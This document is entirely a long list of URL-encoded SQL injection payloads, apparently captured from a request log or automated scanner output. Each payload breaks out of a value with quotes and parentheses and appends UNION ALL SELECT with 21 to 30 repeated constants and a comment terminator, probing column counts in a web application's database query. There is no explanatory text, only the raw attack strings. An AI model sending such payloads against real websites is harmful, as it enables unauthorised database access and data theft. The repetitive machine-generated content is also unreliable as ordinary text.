-4407%29%29%29%20UNION%20ALL%20SELECT%209164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164%2C9164--%20 -7223%20UNION%20ALL%20SELECT%201243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243--%20 -7676%20UNION%20ALL%20SELECT%201112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112--%20 -8681%20UNION%20ALL%20SELECT%204850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850%2C4850--%20 -8138%20UNION%20ALL%20SELECT%203184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184%2C3184--%20 -6062%20UNION%20ALL%20SELECT%208079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079--%20 -3467%20UNION%20ALL%20SELECT%204020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020%2C4020--%20 -7995%20UNION%20ALL%20SELECT%203046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046--%20 -9813%20UNION%20ALL%20SELECT%202379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379--%20 -4200%20UNION%20ALL%20SELECT%203809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809--%20 -8238%20UNION%20ALL%20SELECT%206841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841--%20 -2018%27%29%20UNION%20ALL%20SELECT%209349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349--%20 -8940%27%29%20UNION%20ALL%20SELECT%205785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785--%20 -8658%27%29%20UNION%20ALL%20SELECT%203152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152--%20 -2128%27%29%20UNION%20ALL%20SELECT%209121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121--%20 -4853%27%29%20UNION%20ALL%20SELECT%201882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882--%20 -2732%27%29%20UNION%20ALL%20SELECT%205903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903%2C5903--%20 -6566%27%29%20UNION%20ALL%20SELECT%201813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813%2C1813--%20 -9952%27%29%20UNION%20ALL%20SELECT%207517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517%2C7517--%20 -1576%27%29%20UNION%20ALL%20SELECT%201375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375--%20 -2594%27%29%20UNION%20ALL%20SELECT%207606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606--%20 -4501%27%29%29%20UNION%20ALL%20SELECT%202902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902%2C2902--%20 -6486%27%29%29%20UNION%20ALL%20SELECT%202164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164%2C2164--%20 -7934%27%29%29%20UNION%20ALL%20SELECT%206582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582--%20 -7595%27%29%29%20UNION%20ALL%20SELECT%205337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337%2C5337--%20 -8190%27%29%29%20UNION%20ALL%20SELECT%209203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203%2C9203--%20 -7618%27%29%29%20UNION%20ALL%20SELECT%205219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219%2C5219--%20 -8910%27%29%29%20UNION%20ALL%20SELECT%206909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909%2C6909--%20 -7193%27%29%29%20UNION%20ALL%20SELECT%203276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276--%20 -7066%27%29%29%20UNION%20ALL%20SELECT%204909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909--%20 -8726%27%29%29%20UNION%20ALL%20SELECT%209116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116--%20 -4709%27%29%29%29%20UNION%20ALL%20SELECT%203815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815--%20 -3184%27%29%29%29%20UNION%20ALL%20SELECT%203810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810%2C3810--%20 -4634%27%29%29%29%20UNION%20ALL%20SELECT%207117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117--%20 -6049%27%29%29%29%20UNION%20ALL%20SELECT%206500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500%2C6500--%20 -3250%27%29%29%29%20UNION%20ALL%20SELECT%207079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079%2C7079--%20 -9398%27%29%29%29%20UNION%20ALL%20SELECT%205276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276%2C5276--%20 -6588%27%29%29%29%20UNION%20ALL%20SELECT%201011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011--%20 -9099%27%29%29%29%20UNION%20ALL%20SELECT%209206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206%2C9206--%20 -6627%27%29%29%29%20UNION%20ALL%20SELECT%201345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345%2C1345--%20 -7000%27%29%29%29%20UNION%20ALL%20SELECT%206071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071%2C6071--%20 -4788%27%20UNION%20ALL%20SELECT%206389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389--%20 -6253%27%20UNION%20ALL%20SELECT%201621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621--%20 -1381%27%20UNION%20ALL%20SELECT%207833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833--%20 -9160%27%20UNION%20ALL%20SELECT%209311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311--%20 -1808%27%20UNION%20ALL%20SELECT%203685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685%2C3685--%20 -4956%27%20UNION%20ALL%20SELECT%207875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875--%20 -3717%27%20UNION%20ALL%20SELECT%207797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797%2C7797--%20 -3628%27%20UNION%20ALL%20SELECT%203538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538%2C3538--%20 -5438%27%20UNION%20ALL%20SELECT%207398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398--%20 -2209%27%20UNION%20ALL%20SELECT%203820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820%2C3820--%20 -8847%27%29%20UNION%20ALL%20SELECT%201225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225--%20 -4699%27%29%20UNION%20ALL%20SELECT%208503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503%2C8503--%20 -9006%27%29%20UNION%20ALL%20SELECT%206232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232--%20 -7289%27%29%20UNION%20ALL%20SELECT%205757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757%2C5757--%20 -8787%27%29%20UNION%20ALL%20SELECT%205293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293%2C5293--%20 -3273%27%29%20UNION%20ALL%20SELECT%207565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565--%20 -6686%27%29%20UNION%20ALL%20SELECT%205244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244%2C5244--%20 -2529%27%29%20UNION%20ALL%20SELECT%207654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654--%20 -4619%27%29%20UNION%20ALL%20SELECT%207146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146%2C7146--%20 -5299%27%29%20UNION%20ALL%20SELECT%204958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958--%20 -1580%27%29%29%20UNION%20ALL%20SELECT%202442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442%2C2442--%20 -2758%27%29%29%20UNION%20ALL%20SELECT%203971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971--%20 -6541%27%29%29%20UNION%20ALL%20SELECT%204231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231--%20 -7905%27%29%29%20UNION%20ALL%20SELECT%206058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058%2C6058--%20 -5995%27%29%29%20UNION%20ALL%20SELECT%206354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354%2C6354--%20 -6246%27%29%29%20UNION%20ALL%20SELECT%202540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540--%20 -6304%27%29%29%20UNION%20ALL%20SELECT%208848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848%2C8848--%20 -6659%27%29%29%20UNION%20ALL%20SELECT%209924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924--%20 -5892%27%29%29%20UNION%20ALL%20SELECT%209906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906%2C9906--%20 -5732%27%29%29%20UNION%20ALL%20SELECT%206933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933%2C6933--%20 -7835%27%29%29%29%20UNION%20ALL%20SELECT%205601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601--%20 -6954%27%29%29%29%20UNION%20ALL%20SELECT%203366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366--%20 -8515%27%29%29%29%20UNION%20ALL%20SELECT%209348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348--%20 -5965%27%29%29%29%20UNION%20ALL%20SELECT%202607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607%2C2607--%20 -8330%27%29%29%29%20UNION%20ALL%20SELECT%209882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882--%20 -3163%27%29%29%29%20UNION%20ALL%20SELECT%202180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180%2C2180--%20 -1200%27%29%29%29%20UNION%20ALL%20SELECT%208513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513%2C8513--%20 -4494%27%29%29%29%20UNION%20ALL%20SELECT%208711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711--%20 -9538%27%29%29%29%20UNION%20ALL%20SELECT%206154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154--%20 -4354%27%29%29%29%20UNION%20ALL%20SELECT%205289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289%2C5289--%20 -4249%27%20UNION%20ALL%20SELECT%207603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603%2C7603--%20 -2762%27%20UNION%20ALL%20SELECT%206533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533--%20 -4217%27%20UNION%20ALL%20SELECT%205084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084--%20 -8815%27%20UNION%20ALL%20SELECT%202636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636%2C2636--%20 -7687%27%20UNION%20ALL%20SELECT%205352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352%2C5352--%20 -5876%27%20UNION%20ALL%20SELECT%207245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245--%20 -7454%27%20UNION%20ALL%20SELECT%203041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041--%20 -4862%27%20UNION%20ALL%20SELECT%207297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297--%20 -6070%27%20UNION%20ALL%20SELECT%202459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459%2C2459--%20 -1998%27%20UNION%20ALL%20SELECT%208234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234--%20 -2227%22%29%20UNION%20ALL%20SELECT%205107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107%2C5107--%20 -4317%22%29%20UNION%20ALL%20SELECT%208778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778%2C8778--%20 -7339%22%29%20UNION%20ALL%20SELECT%209841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841--%20 -8998%22%29%20UNION%20ALL%20SELECT%205434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434--%20 -4787%22%29%20UNION%20ALL%20SELECT%203292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292%2C3292--%20 -9810%22%29%20UNION%20ALL%20SELECT%204328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328%2C4328--%20 -3276%22%29%20UNION%20ALL%20SELECT%202161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161--%20 